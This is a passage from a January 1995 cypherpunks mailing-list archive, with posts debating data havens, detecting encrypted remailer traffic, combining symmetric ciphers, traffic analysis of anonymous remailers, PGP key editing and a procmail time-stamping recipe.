13676 | What part of "Congress shall make no law" eludes Congress? From nelson at crynwr.com Thu Jan 12 06:44:09 1995 From: nelson at crynwr.com (Russell Nelson) Date: Thu, 12 Jan 95 06:44:09 PST Subject: good stuff Message-ID: Interestingly enough, there are lots of interesting documents, including anti-clipper screeds etc, on the New York State Education Department's gopher. Good stuff for political activists (as opposed to passivists :). gopher://unix5.nysed.gov:70/11/TelecommInfo/Reading%20Room%20-%20Points%20of%20View -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From jalicqui at prairienet.org Thu Jan 12 07:16:58 1995 From: jalicqui at prairienet.org (Jeff A Licquia) Date: Thu, 12 Jan 95 07:16:58 PST Subject: Knowing Something's Encrypted Message-ID: Maybe I'm missing something here. If I am, please bonk me. Here's a simple method for knowing that some data you received is encrypted: 1. Require a specific method (we'll use PGP in this example). 2. When a message comes in, check for a PGP format message. If you really wanted to get fancy, you could parse the PGP header a bit to make sure the data was really encrypted. It's true that this isn't "cryptographic" in the sense of testing the ciphertext itself, but it should work for the practical goal of enforcing a "must be encrypted" rule. ---------------------------------------------------------------------- Jeff Licquia (lame .sig, huh?) | Finger for PGP 2.6 public key jalicqui at prairienet.org | Me? Speak for whom? You've got licquia at cei.com (work) | to be kidding! From adam at bwh.harvard.edu Thu Jan 12 07:25:33 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Thu, 12 Jan 95 07:25:33 PST Subject: time stamping service (again) In-Reply-To: Message-ID: <199501121525.KAA17530@bwh.harvard.edu> | Anyway, it is now running as the following procmail recipe: | | :0 w | * ^Subject: Time Stamp This Mail | { | PGPPASS=whateveryourpassphraseis | :0 c w | | (lockfile timestamp.lock ; pgp -fast +batchmode +force +verbose=0 \ | +clearsig=off) > timestamp.out | | :0 a h | | (formail -r -i 'Subject: Time Stamp Output';cat timestamp.out) | \ | ($SENDMAIL -t ;rm -f timestamp.lock) | } | | To use it, just send whatever you need time stamped to me with | the subject "time stamp this mail". | | BTW, can a procmail expert explain to me why the locallockfile | mechanism doesn't work with this recipe? If I use :0 w : as | the first line, procmail will happily ignore the locallockfile | flag and proceed to munge up timestamp.out, so I have to do | the filelocking manually. You need a lockfile on the :0 cw line, not on the :0 w . :0 cw: | pgp -fast +batchmode +force +verbose=0 +clearsig=off > timestamp.out From root at nesta.pr.mcs.net Thu Jan 12 07:26:24 1995 From: root at nesta.pr.mcs.net (Nesta Stubbs) Date: Thu, 12 Jan 95 07:26:24 PST Subject: How do I know if its encrypted? In-Reply-To: <199501120540.VAA11357@ix3.ix.netcom.com> Message-ID: On Wed, 11 Jan 1995, Dale Harrison wrote: > > > >A practical system would cut out a notch at 6/8 for ASCII armor, which > >would make approximation techniques a bit tricky. More practical is > >just to detect ASCII armor with a regular expression recognizer and > >de-armor it before the entropy check. > > > >Eric > > > > > Won't work! You can always embed an encrypted message in what 'looks' > like plaintext. A trivial example: Encrypt a message with a caesar > cypher, then build a story where the first char of each word maps to > each subsequent char from the encrypted text. At the cost of expanding > the size of the message by a factor of 5 to 10 you've hidden the > encrypted message in what looks like a letter to your mother (or a news > story in the NY Times, etc.) This is old technique. > > Dale H. But Dale, hat doesn't matter much. the user is then going otu of his way tpo get rejected. The data haven would be knwon to it's users to require encrypted text, and a user who did the scheme you outline above would only be succeding in getting himself rejected. I mean it's nothe operators fault he decided to be snazzy and put iit in plaintext when it was known to be required to be encrypted, as in knowingly encrypted. From root at nesta.pr.mcs.net Thu Jan 12 07:36:14 1995 From: root at nesta.pr.mcs.net (Nesta Stubbs) Date: Thu, 12 Jan 95 07:36:14 PST Subject: Data Havens..A consumer perspective In-Reply-To: Message-ID: On Thu, 12 Jan 1995, Censored Girls Anonymous wrote: > > 1. You have what I want or need. > 2. In order for me to let you store it, I will give it to you > anyway you wish to get it. > 3. I will let you do anything to the data you wish, so long as I > get it back intact. why would you give the haven owner free run? I mean naturally he does have free run with your data once he gets it, but a matter of trust, and encryption protects you marginally. > 4. It is no concern (only idle curiosity maybe) where the data is parked. it matters alot too me, that's the security of the dat, what if your data is sem top secret plan to bomb the pentagon, and you are using the data haven to distibute to your band of anonymous terrorists, I am sure you woudln't want your data stored ona public access Unix system, or in plaintext. > 5. I would expect to pay money for the safekeeping of my data. you casn do this a number of ways if the datahaven is turned into a data broker, i can pay you for good data otehr would be willing to buy(Blacknet anyone?) or you could pay me for access to data, or for safe secure storage and anon transfer of data to other users. > 6. I would expect the longer you hold the data, the more it will cost. > 7. The only thing I am counting on is the data's timely retrieval. > 8. Welcome to the world of data "coatchecking". > > Why make it more complex than this? because it is if you want security, and also to bring in money if that is a motive. > For whether it's encrypted to the nth degree, or parked in a plain brown > wrapper in a massive unix box somewhere, as long as I the haven manager, > return the data in a safe, timely, uncorrupted manner, I've done my duty. > well what would be thepurpose of this data haven you propose except as a extra storage pace for data, like if you dont have space on your own drive? Your leaving out anon drop boxes, data brokering, or the data haven serving as a center for black markets. From daleh at ix.netcom.com Thu Jan 12 07:38:43 1995 From: daleh at ix.netcom.com (Dale Harrison AEGIS) Date: Thu, 12 Jan 95 07:38:43 PST Subject: Cryptanalysis Message-ID: <199501121537.HAA01536@ix2.ix.netcom.com> You wrote: >If the encryption method is any good, the output will be pseudo-random >with no digit being more frequent than any other. This certainly applies >to IDEA and DES. With RSA, you usually have a random (IDEA) session key >encrypted using the senders private key. This will also be an effectively >'random' number. Just a technical note, but a normal distribution of digits (i.e. 'no digit more frequent than any other') is no inidication of either randomness or 'good' encryption. A better test is to look for a normal distribution at all scale levels. For example, the following text block: "UUU" (in ASCII) has a normal distribution at the bit level "0101 0101 0101 0101 0101 0101", but not at the byte level. Dale H. From frissell at panix.com Thu Jan 12 07:41:08 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 12 Jan 95 07:41:08 PST Subject: Pornography, What is it? Message-ID: <199501121539.AA14480@panix.com> -----BEGIN PGP SIGNED MESSAGE----- At 06:29 PM 1/11/95 -0600, root wrote: >Article XIV (1868) > >Sec. 1. > >All persons born or naturalized in the United States, and subject to the >jurisdiction thereof, are citizens of the United States and of the States >wherein they reside. No state shall make or enforce any law which shall >abridge the privileges or immunities of citizens of the United States; >nor shall any State deprive any person of life, liberty, or property, >without due process of law; nor deny to any person within its jurisdiction >the equal protection of the laws. > >Where in there is the protection you speak of? I see no guarantee of my >Constitutional rights, only of privileges and immunities as granted >by the federal government. The courts have held that the term "liberty" in the XIVth Amendment includes the liberties protected by the body of the Constitution and the other Amendments. DCF - -- PGP signing encouraged by Private Idaho (for Windows Eudora) by Joel McNamara -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxVIOYVO4r4sgSPhAQHPfgP+PisOuBlvGgb96M5bjkVdIfDb2JEkb0Nb N4Uw9FoILGtUPibEphsJbRF4GpCd8qfHJvZjP5jTCLztCwo0r/kPc4qDKYPzRpVv EmZm2WwByOBSDqljJJAb3a7bC5b9vOEr2shr29u1apYmGl6sldvi4lTHYMjTOxI3 rUmivlpfsOc= =kTT1 -----END PGP SIGNATURE----- From paul at poboy.b17c.ingr.com Thu Jan 12 07:49:28 1995 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Thu, 12 Jan 95 07:49:28 PST Subject: Multiple symetric cyphers In-Reply-To: <199501120502.VAA29808@largo.remailer.net> Message-ID: <199501121547.AA02187@poboy.b17c.ingr.com> > But selecting a single cipher is just as much a fixed policy as a > randomly selected one is. Far better to let the user pick a policy, > both about sent and accepted ciphers. If you do give the user control, what is an acceptable mechanical implementation? Let's say I have a file encryptor which allows the user to choose between DES, 3DES, IDEA, Diamond, and RC5. Must I require the user to tell that program what cypher was used to encrypt the file she wishes to decrypt? Is storing the cypher type as part of the encrypted file a weakness? -Paul -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### From eric at remailer.net Thu Jan 12 08:04:01 1995 From: eric at remailer.net (Eric Hughes) Date: Thu, 12 Jan 95 08:04:01 PST Subject: Data Havens..A consumer perspective In-Reply-To: Message-ID: <199501121602.IAA00806@largo.remailer.net> From: Censored Girls Anonymous 1. You have what I want or need. You have a _service_ I want to use. 8. Welcome to the world of data "coatchecking". "Data coatchecking" certainly has different connotations than "data haven". I think for marketing purposes, the name "data haven" is inaccurate. A data haven, one might expect, has semantic structure to it. Offsite storage is much less than a data haven; it's much more like a remote file system. Using the word "haven" to refer to a remote storage facility removes the connotation of ordinary usage, which, as we all know is a perfectly upright, normal, and (for those in the USA) a downright Capital-A _American_ thing to do. From the moment the data leaves their hands, until I return it, they have no right, nor I no obligation, to divulge anything about it. You don't want the operator of a remote storage facility revealing links about usage patterns of individuals, but as far as the data itself goes, there's no reason it couldn't be made public (there's also no good reason _to_ make it public, either). Someone who sends plaintext to a remote site is foolish. Eric From eric at remailer.net Thu Jan 12 08:09:33 1995 From: eric at remailer.net (Eric Hughes) Date: Thu, 12 Jan 95 08:09:33 PST Subject: How do I know if its encrypted? In-Reply-To: Message-ID: <199501121608.IAA00812@largo.remailer.net> Of course, we're not just dealing with text. So the scheme has got to be changed a bit so as to be able to detect unencrypted GIFs, and mu-law files, and as yet to be determined unknown files. Each of these data formats has it's own regex recognizers available. Just apply them. The point, though, is to enforce the presumption that the remailer operator does not, in fact, look at the traffic in order to understand the content. You don't need a completely airtight algorithm in order to do this. Eric From eric at remailer.net Thu Jan 12 08:14:14 1995 From: eric at remailer.net (Eric Hughes) Date: Thu, 12 Jan 95 08:14:14 PST Subject: How do I know if its encrypted? In-Reply-To: <199501120646.WAA28573@ix2.ix.netcom.com> Message-ID: <199501121612.IAA00824@largo.remailer.net> From: daleh at ix.netcom.com (Dale Harrison (AEGIS)) It's an artificial example, but one that points out that merely doing a frequency analysis on the datastream isn't enough to guantee the correct answer. You don't always need the correct answer. You just need the correct answer most of the time. You're trying to create a presumption about behavior. Ensuring that you can't read almost all of the traffic is a pretty good way to assure people that you don't try to make sense of any of it. The fundamental purpose here is social communication about intent. Reliable remailer software will have to worry about false postives as well as false negatives; especially if it's a fee-for-service operation. I just don't agree with this. If you feel it needful to install an entropy filter, expect that its failures will simply accrue to the general unrealiability measurement for that remailer. And there's no reason you couldn't publish the algorithm so that a user couldn't check the entropy for themselves in advance. Of course the implicit assumption in that statement is that encrypted traffic hasn't been outlawed or regulated, or that the sender doesn't want to 'appear' to be sending encrypted traffic. I don't design for the paranoid. Eric From jdwilson at gold.chem.hawaii.edu Thu Jan 12 08:18:16 1995 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Thu, 12 Jan 95 08:18:16 PST Subject: Microsoft TrueName (tm) (fwd) Message-ID: <199501121623.LAA23964@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- >From: Censored Girls Anonymous >To: cypherpunks at toad.com >Subject: Re: Microsoft TrueName (tm) >Praise Bob! The Rev. Ivan Stang's been preaching that for years! >Long live the Slackmaster! I wondered why one of the few registered hosts for Microsoft were called "Bob" - now it makes sense. (But they've got a good sized chunk of netblks registered...) - -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxVXWioZzwIn1bdtAQFrygF+LKX95qYx46I4dr7TL5WBZd3brfu8VqcE BDR+o9c/Vqu1XTGTNiS2Ij4JCEm/R4Dw =CMgM -----END PGP SIGNATURE----- From eric at remailer.net Thu Jan 12 08:24:36 1995 From: eric at remailer.net (Eric Hughes) Date: Thu, 12 Jan 95 08:24:36 PST Subject: Multiple symetric cyphers In-Reply-To: <199501120607.BAA19021@bb.hks.net> Message-ID: <199501121623.IAA00846@largo.remailer.net> From: cactus at seabsd.hks.net (L. Todd Masco) >Strength is not right aspect. Global risk is reduced, simply because >the aggregate cost of a breach is reduced. Isn't it? If an attacker does not know what cipher is used and breaking each is computationally expensive (though not prohibitively so) doesn't that add extra complexity? Suppose that several symmetric ciphers are used and that one of them is broken. You then attempt to break all of the messages; the ones that don't break are presumed to be one of the other ciphers. So it does nothing to improve strength. Note, though, that the _rest_ of the messages remain unbroken. I am assuming that it's unlikely that all of the ciphers will be broken simultaneously. Related: is there, in general or in any known specific cases, any loss of security in using sym. cipher A on ciphertext B (of another sym. cipher) with the same key? With different keys (I would think not, but I vaguely remember mention of something here long ago)? If you use the same key, the size of exhaustive search does not increase. Eric From kevin.rock at njackn.com Thu Jan 12 08:32:00 1995 From: kevin.rock at njackn.com (kevin.rock at njackn.com) Date: Thu, 12 Jan 95 08:32:00 PST Subject: Pgp where? Message-ID: <9501120952.0DVJZ00@njackn.com> I think this is the correct board to put this message on, but since there are no messages to read here I might be wrong. Does anyone know where to locate the program (algorithm) Pretty Good Protection (PGP) ? I've read about it in the local newspaper, in Scientific American and in the alternate news message area. It sounds like a good encryption scheme and I would like to explore it's possibilities. Thanks for any assistance. From eric at remailer.net Thu Jan 12 08:33:46 1995 From: eric at remailer.net (Eric Hughes) Date: Thu, 12 Jan 95 08:33:46 PST Subject: Multiple symetric cyphers In-Reply-To: <199501121547.AA02187@poboy.b17c.ingr.com> Message-ID: <199501121632.IAA00887@largo.remailer.net> From: paul at poboy.b17c.ingr.com (Paul Robichaux) Must I require the user to tell that program what cypher was used to encrypt the file she wishes to decrypt? Only if you don't want to store the type alongside. See below. Is storing the cypher type as part of the encrypted file a weakness? Well, it's no weaker than current systems. PGP stores the cipher type in the source code: it's always IDEA. One should allow, however, the cipher type to be empty alongside the data so that another tool can store cipher information. Eric From eric at remailer.net Thu Jan 12 08:38:56 1995 From: eric at remailer.net (Eric Hughes) Date: Thu, 12 Jan 95 08:38:56 PST Subject: Data Havens..A consumer perspective In-Reply-To: Message-ID: <199501121637.IAA00893@largo.remailer.net> From: Nesta Stubbs > 3. I will let you do anything to the data you wish, so long as I > get it back intact. why would you give the haven owner free run? I mean naturally he does have free run with your data once he gets it, That's exactly the reason, namely, to make the agreement between individuals match the underlying nature of information. This is different in the trust in silence about the user. This is also not to say that the operator can't undertake to make assurances about where bits go and don't go. I am sure you woudln't want your data stored ona public access Unix system, or in plaintext. So don't store it in plaintext. The operator of the data storage facility has no responsibility for this. if the datahaven is turned into a data broker I don't know about you, but I don't like paying money for random bits. well what would be thepurpose of this data haven you propose except as a extra storage pace for data, like if you dont have space on your own drive? Even when you've got enough of your own disk space, it's still subject to failure. Putting data in multiple places reduces the possibility of unrecoverable catastrophe. Eric From hfinney at shell.portal.com Thu Jan 12 09:01:09 1995 From: hfinney at shell.portal.com (Hal) Date: Thu, 12 Jan 95 09:01:09 PST Subject: How do I know if its encrypted? Message-ID: <199501121701.JAA24309@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- The data haven concept as I understood it held data for public access in some form (for sale or for free) which would be illegal in some jurisdiction. This might include credit information that was older than the legal limit, libelous claims, damaging medical records, etc. Frankly, I suspect that most usages would be directed towards reducing, rather than increasing, individual privacy. So this is not an area I am interested in working towards. The idea of offsite storage doesn't seem that helpful since you can just store the data on your own disk in encrypted form. Maybe if encryption gets outlawed it would be useful, but then you can't use encryption to communicate with the haven. As far as remailers requiring encryption, one purpose would be to reduce complaints by making it impossible to send some kinds of messages which people would object to. It would be hard to post to usenet, for example, in a useful way. And mail to private individuals could not contain obvious obscenities or other objectionable material. The problem with this is that if people become able to handle and deal with incoming encrypted mail in a transparent way, this restriction is no longer effective in the latter purpose. Someone could get encrypted hate mail and have it transparently decrypted and displayed just like normal mail. They will be just as upset as people are today when they get objectionable mail from the remailer. As far as usenet posts, if a particular decryption key were widely and customarily used in a particular newsgroup, objectionable material could still be widely read if encrypted with that key. Tim May's example of a fake encrypted post containing inflammatory material is a good example of the heat which could occur, especially when the message is real and not a fake one like he did. So I don't think this restriction would really accomplish the desired goal except perhaps in the short term. If the purpose is to have plausible deniability by the remailer operator, I feel we can still get that by publicizing the remailer software source, which has no provisions for manual filtering. A policy of sending only encrypted mail so that the operator can't filter would be no more acceptable to critics of anonymity than a policy of just not filtering at all. Entropy checking is not adequate to detect encryption, as compressed files have maximal entropy as well. For these purposes, compression may be nearly as good as encryption, except that standard compression formats are already widely used. An entropy checker might well pass a gif, jpeg, or zip file, so this filter would by itself be useless to prevent posting of unencrypted graphics. It would probably have to be augmented at least by some checks for these special file formats. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLxVgSRnMLJtOy9MBAQF66wIA3a01avgc0jBjKXH6IMjO+6wj4tBeSUmM ZeRl+xFZFZ4Cfsrik1ghuHXI31isiHUzrPAIVEZfFIpTw6w9T0QdSQ== =YVRq -----END PGP SIGNATURE----- From cactus at seabsd.hks.net Thu Jan 12 09:04:50 1995 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Thu, 12 Jan 95 09:04:50 PST Subject: Multiple symetric cyphers Message-ID: <199501121709.MAA24434@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- In article <199501121623.IAA00846 at largo.remailer.net>, Eric Hughes wrote: >I am assuming that it's unlikely that all of the ciphers will be >broken simultaneously. Quick reasoning note: For forward secrecy, it's unnecessary that the ciphers be broken simultaneously; just that they are broken in the span of time between encryption and the attack. - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxUnexNhgovrPB7dAQE5LwP+JYB/CW87wI8zdgaE64KHffcde/L6c7f9 nrC0AC5ljrKYgUyzDY0XFiDd5kHSp/wtwFeZeGkobihZqGnuHgh9R9wnPTgfrKM5 L+DBymQiHvT8LG+UwBCCNcRH0dDODYpvB3fJrYobvAzEfEazfuWDdYMZ/o4feBqT r2meoZryBxE= =8qyB - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxViPSoZzwIn1bdtAQFC4AF/aIdX8R43DwPV8sfpjzr7MBlS2dFM+kmW MnYjcGHaSCkkyZ9XjXnJ3QWtvTFiigyF =9w/Z -----END PGP SIGNATURE----- From warlord at MIT.EDU Thu Jan 12 09:13:28 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Thu, 12 Jan 95 09:13:28 PST Subject: Multiple symetric cyphers In-Reply-To: <199501121632.IAA00887@largo.remailer.net> Message-ID: <9501121655.AA14127@toxicwaste.media.mit.edu> > Well, it's no weaker than current systems. PGP stores the cipher type > in the source code: it's always IDEA. One should allow, however, the > cipher type to be empty alongside the data so that another tool can > store cipher information. Actually, a slight correction. PGP does have an algorithm byte for the encryption algorithm; this byte is inside the RSA block. (It doesn't have to be RSA, either, but thats a different story). So long as you use a public key to encrypt, you get this byte. If you just use PGP -c, using the current implementation, you do not get a type byte. Oops. My point is that although the current implementation doesn't have multiple encryption schemes, that doesn't mean that it can't have them... -derek From assets at alpha.c2.org Thu Jan 12 09:55:06 1995 From: assets at alpha.c2.org (Offshore Assets) Date: Thu, 12 Jan 95 09:55:06 PST Subject: Chain Message-ID: <199501121752.JAA10878@infinity.c2.org> I use Hal Finney's 'Chain' a lot: it is an easy way of automatically building a remailer chain. But it won't PGP correctly with the Usura and the Flame remailers because these two have e-mail addresses that have changed and/or are different from the addresses specified in their public keys (Usura, for instance, is now , but this is not the address given in its public key ID). Is there a way for me in PGP to edit and update the information contained in the public keys of others? I would want to add an "also known as" line for 'Chain' to spot. O.A. From jrochkin at cs.oberlin.edu Thu Jan 12 10:01:26 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Thu, 12 Jan 95 10:01:26 PST Subject: analysis of RemailerNet Message-ID: At 8:57 AM 01/12/95, Wei Dai wrote: >Alice is sending mail to. After the first day, she can >eliminate about half of the remailer users from the list of possible >targets, because they, like the the random user above, >received a mail even though Alice didn't send one out during the >collection period of that batch. Now, since Eve can eliminate >on average half of the list every day, Bob will be the only person left on >that list after about (log base 2 of one million) = 20 days. > >Suppose Alice sent out some different numbers of cover e-mail: [...] > 3 log base 1 of 1,000,000 = infinity! Yeah, I think it made sense. Let me try to rephrase what you are saying in English rather then math, to see if it's still what you are saying. 1) Attacker Eve wants to figure out who Alice is sending mail to. 2) She can weed people out by noting 'collection periods' where Alice sends mail, but certain people don't receive any mail, and eventually arrive at Bob. 3) If Alice sends mail out in _ever_ collection period, perhaps just to the bit bucket, this method won't work, because there won't be any periods where Alice doesn't send mail out. Hmmm. The basic idea here is simply that you should send out lots of cover mail, at least one piece in every collection period, to prevent this kind of attack. Best, a random number of cover pieces, but at least one every collection period. Several thoughts: 1) If Alice and Bob are both corresponding with many people, things get more complicated. I tried to model it similarly to the way you modeled your simpler situation, but got confused quickly. This would be a good thing to look at. Alice sends and receives mail to several people other then Bob, and same with Bob. I'm not sure how this changes things, if at all. 2) In real life, it's more likely for an attacker to want to discover Alice knowing Bob then it is for him to want to discover Bob knowning Alice. It's Alice who is being anonymous here by using the anonymous RemailerNet, of course. I don't think this changes things either, but it's something to keep in mind. From jamesd at netcom.com Thu Jan 12 10:04:26 1995 From: jamesd at netcom.com (James A. Donald) Date: Thu, 12 Jan 95 10:04:26 PST Subject: Multiple symetric cyphers In-Reply-To: <199501120607.BAA19021@bb.hks.net> Message-ID: > > >Strength is not right aspect. Global risk is reduced, simply because > >the aggregate cost of a breach is reduced. On Thu, 12 Jan 1995, L. Todd Masco wrote: > Isn't it? If an attacker does not know what cipher is used and breaking > each is computationally expensive (though not prohibitively so) doesn't > that add extra complexity? The increase in strength, if each cypher was roughly equal, is merely order n, where n is the number of cyphers. If, as is likely, one of the cyphers required a billionfold less power to break than the others, you have decreased strength by an enormous factor. The way to increase strength is to use a cypher, such as IDEA, which has a large key. Key size will increase strength by a factor of billions, not a factor of n. Current key sizes are such that computationally expensive attacks do not work on symmetric cyphers. An attack has to be clever. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we http://nw.com/jamesd/ are. True law derives from this right, not from James A. Donald the arbitrary power of the omnipotent state. jamesd at netcom.com From lmccarth at thor.cs.umass.edu Thu Jan 12 10:05:39 1995 From: lmccarth at thor.cs.umass.edu (L. McCarthy) Date: Thu, 12 Jan 95 10:05:39 PST Subject: Purpose of Data Havens Message-ID: <199501121810.NAA25089@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Hal writes: > The idea of offsite storage doesn't seem that helpful since you can just > store the data on your own disk in encrypted form. Maybe if encryption > gets outlawed it would be useful, but then you can't use encryption to > communicate with the haven. As Eric notes elsewhere, off-site backups are useful in general in case some physical calamity strikes your site. It seems to me that a data haven addresses a more aggressive threat model than this. Rather than just worrying about the act of a hacker / nature / etc. eradicating our local copies of data (encrypted or not), we're concerned about intelligent agents (human or electronic) attempting to commit genocide on all instances of some data we possess. Scenario: June is a test engineer at Rockwell Intl. At the lab where she works, it is observed that some rubber O-rings being designed for the space shuttle are liable to crack, and lose their airtight seal, when exposed to the extremely low temperatures of space. The project is behind, so the researchers are instructed to proceed in spite of the problem. June encrypts the test results and deposits them in a data haven. Then she calls her boss's boss and offers a deal (whitemail ?). Either the part is redesigned, or she'll present the incriminating evidence to the New York Times. Even if Rockwell sends some goons to June's apartment while she's at work the next day, to reduce her laptop to solder, she still has the means to carry out her threat. "Rikki don't lose that number - send it off in a letter to yourself"-Steely Dan -L. Futplex McCarthy - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxVwgSoZzwIn1bdtAQF0vwGAuLRLR9PVcj9Q8NCqNDvRf4bC5zUA4A/U m/9tT74hoQNEBNEzw1TqZTr0ZxHtciwd =uXUO -----END PGP SIGNATURE----- From jrochkin at cs.oberlin.edu Thu Jan 12 10:05:56 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Thu, 12 Jan 95 10:05:56 PST Subject: Reefer madness Message-ID: At 9:35 AM 01/12/95, Russell Nelson wrote: >misdemeanor. I spoke to Bob Penna, the legislative aide who >researched and wrote up the bill for Bill Sears. He realizes that the >Internet cannot reasonably be censored, and that the solution is to be >able to punish people who do it (hence the felony) and to educate I dont' find that particularly reassuring. "being able to punish people who do it," is ultimately going to have to consist of preventing non-GAK encryption, in the minds of the Gubmint. You can't punish them if you can't catch them, and you can't catch them if they use strong encryption. Well, in reality you still can catch them, after all no one can sexually assault anyone over the internet (yet, anyway). Sometime they've got to do something in person, and there's no encryption in a physical meeting, where everyone sees your TrueFace. But I'm not sure how much I trust the gubmint types to take this all into account, instead of just abolishing crypto on the typical four horsemen platform. From jamesd at netcom.com Thu Jan 12 10:09:07 1995 From: jamesd at netcom.com (James A. Donald) Date: Thu, 12 Jan 95 10:09:07 PST Subject: How do I know if its encrypted? In-Reply-To: Message-ID: On Thu, 12 Jan 1995, Jonathan Rochkind wrote: > Of course, we're not just dealing with text. So the scheme has got to be > changed a bit so as to be able to detect unencrypted GIFs, and mu-law > files, and as yet to be determined unknown files. I don't know enough > about what's being talked about to know if this entropy detecting stuff > will generalize to non text files. Graphics files are already compressed, so they pass the entropy test, but they start with a distinctive header. The best way to stop graphics would be a volume limit per apparent source and per apparent destination. To program that is a bit like hard work. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we http://nw.com/jamesd/ are. True law derives from this right, not from James A. Donald the arbitrary power of the omnipotent state. jamesd at netcom.com From warlord at MIT.EDU Thu Jan 12 10:13:28 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Thu, 12 Jan 95 10:13:28 PST Subject: Chain In-Reply-To: <199501121752.JAA10878@infinity.c2.org> Message-ID: <9501121813.AA14895@toxicwaste.media.mit.edu> > Is there a way for me in PGP to edit and update the information contained > in the public keys of others? > I would want to add an "also known as" line for 'Chain' to spot. Sure, pgp -ke will do that for you.. Its just that the new ID will not be certified, and PGP will consider the key invalid as far as trust goes.. -derek From jrochkin at cs.oberlin.edu Thu Jan 12 10:13:52 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Thu, 12 Jan 95 10:13:52 PST Subject: Data Havens..A consumer perspective Message-ID: At 4:30 AM 01/12/95, Nesta Stubbs wrote: >> 4. It is no concern (only idle curiosity maybe) where the data is parked. > >it matters alot too me, that's the security of the dat, what if your data >is sem top secret plan to bomb the pentagon, and you are using the data >haven to distibute to your band of anonymous terrorists, I am sure you >woudln't want your data stored ona public access Unix system, or in >plaintext. You shouldn't ever give the operator the info in plaintext. Encrypt it, public or otherwise, and distribute the key to your Band of Merry Men. Then it doesn't matter even it's sitting on a public access Unix system, no one can read it anyhow. The main point of this kind of data haven seems to be providing you a remote location to store your data, in an anonymous way, so even if it does end up being found out, you can't be linked to it. I wouldn't trust the operator to do anything particular with the data other then keep it safe enough so I can retrieve it later, and I'd take the neccesary precautions to account for that lack of trust. The only reason I'd trust him to even keep it safe for me, is because of reputation market. If he routinely loses people's data, word is going to get around. On the other hand, if he routinely shows people's data to the FBI, no one is even going to know about it. I don't trust him not to routinely show the data to the FBI, or store it in public. Use encryption. Of course there are different purposes for data havens, which would require more trust of the operator. But I'm not sure how well those are ever going to work, because I'd much rather trust my encryption then trust the operator. From jrochkin at cs.oberlin.edu Thu Jan 12 10:19:31 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Thu, 12 Jan 95 10:19:31 PST Subject: How do I know if its encrypted? Message-ID: At 12:01 PM 01/12/95, Hal wrote: >The idea of offsite storage doesn't seem that helpful since you can just >store the data on your own disk in encrypted form. Maybe if encryption >gets outlawed it would be useful, but then you can't use encryption to >communicate with the haven. Hmm. I post through a long anonymous remailer chain to an appropriate newsgroup: "I have made an archive of state secrets (or trade secrets, for that matter, or pornography), available on data haven Wherever. Ask to receieve the following file for a list of contents." Seems it could be useful. Especially if you had some way of extracting digicash payment from it, in an anonymous way. But even if you didn't, perhaps you want to make this info available as a public service. I sure as heck wouldn't want it sitting on a hard drive in my bedroom. From dfloyd at io.com Thu Jan 12 10:31:09 1995 From: dfloyd at io.com (dfloyd at io.com) Date: Thu, 12 Jan 95 10:31:09 PST Subject: Farewell for a bit Message-ID: <199501121830.MAA09124@pentagon.io.com> I need to work on the DH code, so I am unsubbing for a while. Please can the cheers, allright? ;-) From nelson at crynwr.com Thu Jan 12 10:35:55 1995 From: nelson at crynwr.com (Russell Nelson) Date: Thu, 12 Jan 95 10:35:55 PST Subject: Reefer madness In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Date: Thu, 12 Jan 1995 13:10:08 -0500 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) At 9:35 AM 01/12/95, Russell Nelson wrote: >misdemeanor. I spoke to Bob Penna, the legislative aide who >researched and wrote up the bill for Bill Sears. He realizes that the >Internet cannot reasonably be censored, and that the solution is to be 